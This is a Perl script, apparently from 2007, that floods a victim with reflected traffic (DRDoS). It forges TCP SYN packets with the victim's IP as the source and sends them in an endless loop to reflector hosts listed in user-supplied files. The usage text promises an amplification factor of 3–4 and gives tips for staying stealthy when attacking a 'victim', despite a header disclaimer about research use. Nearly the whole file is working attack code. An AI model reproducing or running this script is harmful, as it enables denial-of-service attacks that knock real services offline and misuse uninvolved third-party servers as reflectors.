#!/usr/bin/perl # # ~written by whoppix (c) 2007~ # This Piece of software may be freely (re-)distributed under the Terms of the LGPL. # for a short usage type ./script --help # this program requires: perl, Net::RawIP (depends on libpcap), Getopt::Long # (which should be shipped along with your perl core distribution) # if you want to gain a deeper understanding about how DRDoS works, have a look at: # http://www.grc.com/dos/drdos.htm # This program is written for testing and researching purposes only. # use warnings; use strict; use Net::RawIP; use Getopt::Long; my $verbose = '0'; my $syn_count = '1'; my $victim = ''; my @lists = (); my $net = new Net::RawIP; GetOptions( 'verbose+' => \$verbose, 'syn_count=s' => \$syn_count, 'list=s' => \@lists, 'help' => \&usage, ); $victim = shift @ARGV; if ( !$victim ) { die "Error: No target specified, use --help\n"; } if ( !@lists ) { die "Error: You have to specify at least one reflector list, use --help\n"; } foreach my $file (@lists) { if ( !-e $file ) { die "File does not seem to exist: $file\n"; } } print "Starting attack on target $victim.\n"; print "press Ctrl-C to interrupt at any time.\n" if $verbose >= 1; while (1) { foreach my $listfile (@lists) { print "Loading reflector file: $listfile\n" if $verbose >= 1; open( my $list, "<", $listfile ) or die "Error opening file for reading: $listfile\n"; while (<$list>) { chomp; if ( check_format($_) ) { my $counter = $syn_count; my $reflector = $_; my ( $ip, $port ) = split( ':', $reflector ); print "reflector ip: $ip, reflector port: $port\n" if $verbose > 1; for ( my $counter = $syn_count; $counter > 0; $counter-- ) { print "attacking using reflector: $reflector\n" if $verbose > 1; my $rand = int( rand(65535) ); while ( $rand == 0 ) { print "random number calculated for SRCPORT was zero, retrying...\n" if $verbose > 1; $rand = int( rand(65535) ); } print "random port used for SRCPORT: $rand\n" if $verbose > 1; $net->set( { ip => { saddr => $victim, daddr => $ip, }, tcp => { source => $rand, dest => $port, syn => 1, }, } ); $net->send(); } } else { print "mirror \"$_\" not in correct format (ip:port) omitting...\n" if $verbose >= 1; } } } } sub usage { print "\nusage:\n\n"; print "--help\t\t: youre reading it\n"; print "--verbose\t: makes the script more verbose. can be used several times to increase verbosity.\n"; print "--list\t\t: used to specify a reflectorlist.\n"; print "\t\texample: ./script --list list1.txt --list list2.txt --list list3.txt\n"; print "\t\tthe more (and longer) lists you have, the better will the result be, and the more stealth you will gain.\n"; print "--syn_count\t: used to set the syn_count to a special value. default is 1.\n"; print "\t\tdon't use too much - that would decrease your stealth. Default (and that should be fine) is 1.\n"; print "\nGeneral information:\n"; print "The usage of multiple lists can increase your stealth.\n"; print "The more Mirrors or \"reflectors\" you use, the better will the result be.\n"; print "The better the bandwidth of your mirrors is, the better will the result be.\n"; print "Generally spoken is the bandwidth you use to flood your victim amplified by the factor 3-4.\n\n"; die "\n"; } sub check_format { # a function to check the ip:port format. no warnings; my $address = shift; my ( $ip, $port ) = split( ':', $address ); my @octets = split( '\.', $ip ); if ( $port < 1 or $port > 65535 ) { print "port $port too high or low\n" if $verbose >= 1; return; } if ( @octets != 4 ) { print "ip has invalid number of octetts: $ip\n" if $verbose >= 1; return; } foreach my $octet (@octets) { if ( $octet < 0 or $octet > 255 ) { print "octet is invalid: $octet\n" if $verbose >= 1; return; } } print "VALID!\n" if $verbose > 1; return 1; }